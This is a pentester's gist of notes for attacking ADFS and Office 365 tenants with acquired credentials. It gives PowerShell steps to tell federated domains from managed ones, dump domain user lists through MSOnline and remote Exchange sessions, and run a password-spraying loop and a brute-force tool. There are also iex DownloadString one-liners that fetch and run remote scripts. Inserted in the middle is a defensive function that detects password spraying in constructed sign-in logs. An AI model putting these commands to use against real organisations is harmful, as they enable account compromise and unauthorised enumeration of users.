@timelf123
Forked from nullbind/ADFS Notes
Created May 9, 2019 18:26
ADFS Notes
Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.
Install Apps
Download and install Visual Studio 10
Download and install the Lync SDK
https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
http://go.microsoft.com/fwlink/?LinkID=248583
Download and install Microsoft Online Services Sign-In Assistant for IT Professionals RTW
http://go.microsoft.com/fwlink/?LinkID=286152
get-command -Module MSOnline
get-command -Module MSOnlineExtended
Download and Install the Azure Active Directory Module for Windows PowerShell (64-bit version)
http://go.microsoft.com/fwlink/p/?linkid=236297
Import the scripts
git clone https://github.com/NetSPI/PowerShell
import-module PowerSkype.ps1
import-module Get-ADFSEndpoint.ps1
or
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-ADFSEndpoint.ps1")
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/PowerSkype.ps1")
Fingerprint Federated and Managed Domains
# Summary: managed = authentication handled in the Microsoft cloud; federated = authentication handled by an internally hosted identity provider
# Check if domain email is managed or federated
Get-ADFSEndpoint -email username@domain.com
Email : username@domain.com
Type : Federated
Domain : domain.com
BrandName : domain.com
AuthURL : https://idp.domain.com/idp/profile/SAML2/POST/SSO
# Check if domain is managed or federated
Get-SkypeFederation -domain domain.com
Domain : domain.com
MS=MS* : True
_sip._tcp : True
_sip._tls : False
_sipfederationtls._tcp : False
# Get skype status
Get-SkypeStatus -email username@domain.com
Information Gathering for Managed Domains
# Get list of emails for azure services - must be managed domain
# Reference: https://msdn.microsoft.com/en-us/library/azure/dn194123(v=azure.98).aspx
# Reference: https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
# See references for other command examples
# Get Domain Users
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
connect-msolservice -credential $credentials
Get-MsolDomain
Get-MsolUser
Information Gathering for Federated Domains
# Get Domain Users
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection
Get-PSSession
Id Name ComputerName State ConfigurationName Availability
-- ---- ------------ ----- ----------------- ------------
2 Session2 outlook.offi... Opened Microsoft.Exchange Available
Enter-PSSession 2
Get-Command | Select-Object Name
Execute a single command and store the results in a CSV file (opens in Excel) - get domain user information
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:\temp\domain_users.csv -NoTypeInformation
# Super slow / dirty dictionary attack option
$Users = Get-Content C:\temp\users.txt
$Password = "Password"
$Users |
ForEach-Object {
Write-Output "Testing $Password on $_"
$PWord = ConvertTo-SecureString -String "$Password" -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "$_", $PWord
Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {get-user | select-object name -expandproperty name}
}
Also see: https://blog.netspi.com/targeting-passwords-managed-federated-microsoft-accounts/
https://gallery.technet.microsoft.com/scriptcenter/Invoke-ADFSSecurityTokenReq-09e9c90c
https://github.com/NetSPI/PowerShell/blob/master/Invoke-ExternalDomainBruteforce.ps1
Invoke-ExternalDomainBruteforce -list .\emails.txt -password 'Password!' -domain company.com | ft -AutoSize
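The dictionary loop above leaves a recognizable trace in sign-in logs: one source trying many different accounts in a short window, each only once or twice. The following is an added detection example, not part of the original notes or the NetSPI scripts. The function name Find-PasswordSpray, the CSV column names and the thresholds are assumptions, and the log rows are constructed.

```powershell
# Constructed sample sign-in records (not real data). Column names are
# assumptions; map them to the fields of your own sign-in log export.
$SampleLog = @'
Time,User,SourceIp,Protocol,Result
2019-05-09T18:00:05Z,alice@example.com,203.0.113.10,RemotePowerShell,Failure
2019-05-09T18:00:41Z,bob@example.com,203.0.113.10,RemotePowerShell,Failure
2019-05-09T18:01:17Z,carol@example.com,203.0.113.10,RemotePowerShell,Failure
2019-05-09T18:01:52Z,dave@example.com,203.0.113.10,RemotePowerShell,Success
2019-05-09T18:02:30Z,erin@example.com,203.0.113.10,RemotePowerShell,Failure
2019-05-09T18:03:00Z,frank@example.com,198.51.100.7,RemotePowerShell,Failure
2019-05-09T18:03:20Z,frank@example.com,198.51.100.7,RemotePowerShell,Failure
2019-05-09T18:03:45Z,frank@example.com,198.51.100.7,RemotePowerShell,Success
'@ | ConvertFrom-Csv

function Find-PasswordSpray {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $MinUsers = 4,        # distinct accounts tried from one source
        [int] $WindowMinutes = 10   # sliding window length
    )
    foreach ($src in ($Events | Group-Object SourceIp)) {
        $rows = @($src.Group |
            Select-Object User, Result,
                @{ n = 'At'; e = { [datetime]::Parse($_.Time).ToUniversalTime() } } |
            Sort-Object At)
        $start = 0
        for ($end = 0; $end -lt $rows.Count; $end++) {
            # Advance the left edge until the window spans at most WindowMinutes
            while (($rows[$end].At - $rows[$start].At).TotalMinutes -gt $WindowMinutes) { $start++ }
            $users = @($rows[$start..$end] | Select-Object -ExpandProperty User -Unique)
            if ($users.Count -ge $MinUsers) {
                # Report each source once, at the first window that crosses the threshold
                [pscustomobject]@{
                    SourceIp      = $src.Name
                    WindowStart   = $rows[$start].At
                    UsersInWindow = $users.Count
                    # A success from a spraying source is a likely compromised account
                    Succeeded     = @($rows | Where-Object Result -eq 'Success' |
                                      Select-Object -ExpandProperty User -Unique)
                }
                break
            }
        }
    }
}

Find-PasswordSpray -Events $SampleLog | Format-List
```

On the sample rows only 203.0.113.10 is reported, with dave@example.com listed under Succeeded; the single user retrying from 198.51.100.7 stays below the distinct-account threshold.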
More notes from: https://gist.github.com/skillriver/783295e9c4bc0da63cc71eb7833535c0
# connect to azure and office365 with powershell
# 2016-01-13
# get password
$cred = Get-Credential
#office365 session
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $Session
#azure AD connect
Connect-MsolService -Credential $cred
More notes from: https://gist.githubusercontent.com/skillriver/783295e9c4bc0da63cc71eb7833535c0/raw/c3e73f28c23987190b0d7f5dca6bc4985aca0010/GroupAzureADUPNSuffix.ps1
# Require the Azure Active Directory PowerShell Module
Import-Module MSOnline
# Credential and Connect
$msolcred = Get-Credential
Connect-MsolService -Credential $msolcred
# Group count of all UPN suffixes in your Azure AD
Get-MsolUser -All | Select UserPrincipalName, @{Name="UPNSuffix"; Expression={($_.UserPrincipalName.Split("@",2)[1])}} | Group UPNSuffix